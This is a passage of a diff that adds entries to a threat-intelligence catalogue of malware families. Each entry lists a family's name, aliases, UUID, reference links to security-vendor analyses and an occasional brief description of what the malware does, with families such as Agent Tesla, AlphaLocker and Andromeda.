+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet",
+ "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/"
+ ]
+ },
+ "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb",
+ "value": "Pwnet",
+ "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Retefe"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe",
+ "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/",
+ "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same",
+ "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/",
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga"
+ ]
+ },
+ "uuid": "80acc956-d418-42e3-bddf-078695a01289",
+ "value": "Dok",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd",
+ "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en"
+ ]
+ },
+ "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a",
+ "value": "systemd",
+ "description": "General purpose backdoor"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos",
+ "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/"
+ ]
+ },
+ "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c",
+ "value": "Uroburos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti",
+ " https://401trg.pw/an-update-on-winnti/",
+ "https://401trg.pw/winnti-evolution-going-open-source/"
+ ]
+ },
+ "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
+ "value": "Winnti",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker",
+ "https://objective-see.com/blog/blog_0x16.html",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
+ ]
+ },
+ "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5",
+ "value": "WireLurker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet",
+ "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
+ "https://news.drweb.com/show/?i=2679&lng=en&c=14"
+ ]
+ },
+ "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e",
+ "value": "Wirenet",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent",
+ "https://twitter.com/PhysicalDrive0/status/845009226388918273",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/"
+ ]
+ },
+ "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
+ "value": "X-Agent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd",
+ "https://objective-see.com/blog/blog_0x16.html"
+ ]
+ },
+ "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a",
+ "value": "XSLCmd",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas",
+ "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
+ "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
+ ]
+ },
+ "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7",
+ "value": "PAS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Webshell by Orb"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso",
+ "https://github.com/wso-shell",
+ "https://securelist.com/energetic-bear-crouching-yeti/85345/"
+ ]
+ },
+ "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7",
+ "value": "WSO",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos",
+ "https://www.group-ib.com/resources/threat-research/silence.html"
+ ]
+ },
+ "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90",
+ "value": "Silence DDoS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater",
+ "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
+ ]
+ },
+ "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3",
+ "value": "BONDUPDATER",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer",
+ "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless"
+ ]
+ },
+ "uuid": "0db05333-2214-49c3-b469-927788932aaa",
+ "value": "GhostMiner",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy",
+ "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html",
+ "https://github.com/matthewdunwoody/POSHSPY"
+ ]
+ },
+ "uuid": "4df1b257-c242-46b0-b120-591430066b6f",
+ "value": "POSHSPY",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware",
+ "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats"
+ ]
+ },
+ "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c",
+ "value": "PowerWare",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner",
+ "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
+ ]
+ },
+ "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419",
+ "value": "POWRUNER",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca"
+ ]
+ },
+ "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24",
+ "value": "QUADAGENT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca"
+ ]
+ },
+ "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d",
+ "value": "RogueRobin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater",
+ "https://github.com/Kevin-Robertson/Tater"
+ ]
+ },
+ "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24",
+ "value": "Tater PrivEsc",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell",
+ "https://github.com/Mr-Un1k0d3r/ThunderShell"
+ ]
+ },
+ "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4",
+ "value": "ThunderShell",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant",
+ "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
+ ]
+ },
+ "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e",
+ "value": "WMImplant",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot",
+ "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
+ "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/",
+ "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
+ "http://seclists.org/fulldisclosure/2017/Mar/7",
+ "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
+ "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
+ "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f"
+ ]
+ },
+ "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5",
+ "value": "BrickerBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra",
+ "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/",
+ "https://www.youtube.com/watch?v=Bk-utzAlYFI"
+ ]
+ },
+ "uuid": "30a22cdb-9393-460b-86ae-08d97c626155",
+ "value": "Saphyra",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy",
+ "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
+ ]
+ },
+ "uuid": "4305d59a-0d07-4021-a902-e7996378898b",
+ "value": "FlexiSpy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n",
+ "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/",
+ "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n"
+ ]
+ },
+ "uuid": "ac2608e9-7851-409f-b842-e265b877a53c",
+ "value": "7ev3n",
+ "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Hydraq",
+ "McRAT"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002",
+ "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
+ "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
+ "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
+ "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315",
+ "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/",
+ "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
+ "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
+ "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/"
+ ]
+ },
+ "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f",
+ "value": "9002 RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "PinkKite"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos",
+ "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak",
+ "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/"
+ ]
+ },
+ "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d",
+ "value": "AbaddonPOS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker"
+ ]
+ },
+ "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83",
+ "value": "Abbath Banker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain",
+ "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/"
+ ]
+ },
+ "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41",
+ "value": "AcridRain",
+ "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym",
+ "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/"
+ ]
+ },
+ "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e",
+ "value": "Acronym",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker",
+ "https://twitter.com/JaromirHorejsi/status/813712587997249536",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016"
+ ]
+ },
+ "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1",
+ "value": "AdamLocker",
+ "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob",
+ "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/"
+ ]
+ },
+ "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf",
+ "value": "win.adkoob",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot",
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot"
+ ]
+ },
+ "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5",
+ "value": "AdvisorsBot",
+ "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz",
+ "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar"
+ ]
+ },
+ "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58",
+ "value": "Adylkuzz",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ComRAT",
+ "Sun rootkit"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz",
+ "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
+ "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
+ "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
+ "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
+ "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/"
+ ]
+ },
+ "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
+ "value": "Agent.BTZ",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
+ "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
+ "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
+ "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
+ "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
+ "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
+ "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting"
+ ]
+ },
+ "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380",
+ "value": "Agent Tesla",
+ "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot"
+ ]
+ },
+ "uuid": "43ec8adc-0658-4765-be20-f22679097fab",
+ "value": "Aldibot",
+ "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/"
+ ]
+ },
+ "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca",
+ "value": "Project Alice",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "alina_spark",
+ "katrina",
+ "alina_eagle"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos",
+ "http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/",
+ "https://www.nuix.com/blog/alina-continues-spread-its-wings",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/"
+ ]
+ },
+ "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70",
+ "value": "Alina POS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Starman"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple",
+ "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/",
+ "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf"
+ ]
+ },
+ "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094",
+ "value": "Allaple",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator",
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/"
+ ]
+ },
+ "uuid": "a0881a0c-e677-495b-b475-290af09bb716",
+ "value": "Alma Communicator",
+ 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" + ] + }, + "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", + "value": "AlmaLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", + "value": "ALPC Local PrivEsc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", + "https://twitter.com/JaromirHorejsi/status/813714602466877440" + ] + }, + "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", + "value": "Alphabet Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", + "https://blog.cylance.com/an-introduction-to-alphalocker" + ] + }, + "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", + "value": "AlphaLocker", + "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. 
The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", + "value": "AlphaNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", + "value": "Alreay", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Olmarik", + "Pihar", + "TDSS", + "TDL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", + "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" + ] + }, + "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", + "value": "Alureon", + 
"description": "" + }, + { + "meta": { + "synonyms": [ + "Adupihan" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", + "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", + "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + ] + }, + "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", + "value": "AMTsol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gamarue", + "B106-Gamarue", + "B67-SS-Gamarue", + "b66" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", + "http://blog.morphisec.com/andromeda-tactics-analyzed", + "https://blog.avast.com/andromeda-under-the-microscope", + "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", + "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", + "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", + "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", + "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", + "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", + "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", + "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/" + ] + }, + 
"uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", + "value": "Andromeda", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" + ] + }, + "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", + "value": "Anel", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Latinus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" + ] + }, + "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", + "value": "Antilam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", + "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" + ] + }, + "uuid": "d3e16d46-e436-4757-b962-6fd393056415", + "value": "Apocalipto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", + "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" + ] + }, + "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", + "value": "Apocalypse", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 